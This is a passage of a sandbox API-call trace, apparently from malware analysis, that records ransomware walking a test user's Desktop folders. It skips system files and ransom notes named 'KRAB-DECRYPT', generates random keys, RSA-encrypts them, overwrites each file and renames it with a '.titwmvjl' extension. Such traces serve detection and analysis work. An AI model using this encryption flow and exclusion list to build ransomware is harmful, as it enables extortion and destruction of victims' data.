fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5035b8 [0088.542] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.542] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.542] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.542] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.542] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.542] lstrcmpW (lpString1="Ck wqS.mp3", lpString2=".") returned 1 [0088.542] lstrcmpW (lpString1="Ck wqS.mp3", lpString2="..") returned 1 [0088.542] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\", lpString2="Ck wqS.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\Ck wqS.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\Ck wqS.mp3" [0088.542] lstrlenW (lpString=".titwmvjl") returned 9 [0088.542] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\Ck wqS.mp3") returned 73 [0088.542] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.542] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\Ck wqS.mp3.titwmvjl") returned 82 [0088.542] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\Ck wqS.mp3") returned 73 [0088.542] lstrlenW (lpString=".mp3") returned 4 [0088.542] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.543] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0088.543] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0088.543] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.543] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\Ck wqS.mp3") returned 73 [0088.543] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\Ck wqS.mp3") returned 73 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="desktop.ini") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="autorun.inf") returned 1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="ntuser.dat") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="iconcache.db") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="bootsect.bak") returned 1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="boot.ini") returned 1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="ntuser.dat.log") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="thumbs.db") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="CRAB-DECRYPT.html") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="CRAB-DECRYPT.txt") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="ntldr") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="NTDETECT.COM") returned -1 [0088.543] lstrcmpiW (lpString1="Ck wqS.mp3", lpString2="Bootfont.bin") returned 1 [0088.543] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\Ck wqS.mp3") returned 73 [0088.543] lstrlenW (lpString=".mp3") returned 4 [0088.543] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.543] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0088.543] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.544] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.544] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\Ck wqS.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\alha3auz\\ck wqs.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0088.544] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.544] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0088.545] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.545] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.545] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.546] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.546] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.547] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.547] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0088.547] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.547] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.547] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.547] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.547] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.605] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.605] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.605] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.605] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0088.605] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.605] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.605] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.606] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.606] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.607] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.607] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5038f8) returned 1 [0088.607] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.607] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.608] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.608] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.608] GetLastError () returned 0x0 [0088.608] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.608] CryptDestroyKey (hKey=0x5038f8) returned 1 [0088.608] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.608] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.608] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.609] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.610] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.610] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503578) returned 1 [0088.610] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.610] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.610] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.610] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.611] GetLastError () returned 0x0 [0088.611] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.611] CryptDestroyKey (hKey=0x503578) returned 1 [0088.611] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.611] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.611] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.611] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.611] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x14d72, lpOverlapped=0x0) returned 1 [0088.618] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffeb28e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.618] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14d72, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x14d72, lpOverlapped=0x0) returned 1 [0088.619] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.619] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0088.621] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.624] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.624] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.625] CloseHandle (hObject=0x2c4) returned 1 [0088.625] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\Ck wqS.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\alha3auz\\ck wqs.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\Ck wqS.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\alha3auz\\ck wqs.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0088.626] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.626] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.626] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0088.626] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0088.626] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\d2ca4a09d2ca4deb61a.lock" [0088.626] lstrlenW (lpString=".titwmvjl") returned 9 [0088.626] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\d2ca4a09d2ca4deb61a.lock") returned 87 [0088.626] VirtualAlloc (lpAddress=0x0, dwSize=0xee, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.626] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 96 [0088.626] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\d2ca4a09d2ca4deb61a.lock") returned 87 [0088.626] lstrlenW (lpString=".lock") returned 5 [0088.627] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.627] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0088.627] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.627] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.627] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.627] lstrcmpW (lpString1="rF0F83OeRTkaj.swf", lpString2=".") returned 1 [0088.627] lstrcmpW (lpString1="rF0F83OeRTkaj.swf", lpString2="..") returned 1 [0088.627] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\", lpString2="rF0F83OeRTkaj.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\rF0F83OeRTkaj.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\rF0F83OeRTkaj.swf" [0088.627] lstrlenW (lpString=".titwmvjl") returned 9 [0088.627] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\rF0F83OeRTkaj.swf") returned 80 [0088.627] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.627] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\rF0F83OeRTkaj.swf.titwmvjl") returned 89 [0088.627] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\rF0F83OeRTkaj.swf") returned 80 [0088.627] lstrlenW (lpString=".swf") returned 4 [0088.627] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.628] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0088.628] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0088.628] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.628] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\rF0F83OeRTkaj.swf") returned 80 [0088.628] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\rF0F83OeRTkaj.swf") returned 80 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="desktop.ini") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="autorun.inf") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="ntuser.dat") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="iconcache.db") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="bootsect.bak") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="boot.ini") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="ntuser.dat.log") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="thumbs.db") returned -1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="KRAB-DECRYPT.html") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="CRAB-DECRYPT.html") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="ntldr") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="NTDETECT.COM") returned 1 [0088.628] lstrcmpiW (lpString1="rF0F83OeRTkaj.swf", lpString2="Bootfont.bin") returned 1 [0088.628] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\rF0F83OeRTkaj.swf") returned 80 [0088.628] lstrlenW (lpString=".swf") returned 4 [0088.628] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.629] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0088.629] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.629] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.629] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\rF0F83OeRTkaj.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\alha3auz\\rf0f83oertkaj.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0088.630] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.630] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0088.630] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.630] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.631] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.632] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.632] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.632] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.632] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0088.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.632] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.632] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.633] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.634] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.634] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.634] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.634] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0088.634] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.634] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.634] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.634] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.635] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.636] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.636] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5037f8) returned 1 [0088.636] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.636] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.636] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.636] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.636] GetLastError () returned 0x0 [0088.636] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.636] CryptDestroyKey (hKey=0x5037f8) returned 1 [0088.636] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.637] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.637] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.637] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.638] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.638] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503638) returned 1 [0088.638] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.638] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.638] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.639] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.639] GetLastError () returned 0x0 [0088.639] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.639] CryptDestroyKey (hKey=0x503638) returned 1 [0088.639] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.639] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.639] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.639] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.640] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0xe737, lpOverlapped=0x0) returned 1 [0088.646] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffff18c9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.646] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe737, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0xe737, lpOverlapped=0x0) returned 1 [0088.647] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.647] WriteFile (in: hFile=0x2c4, 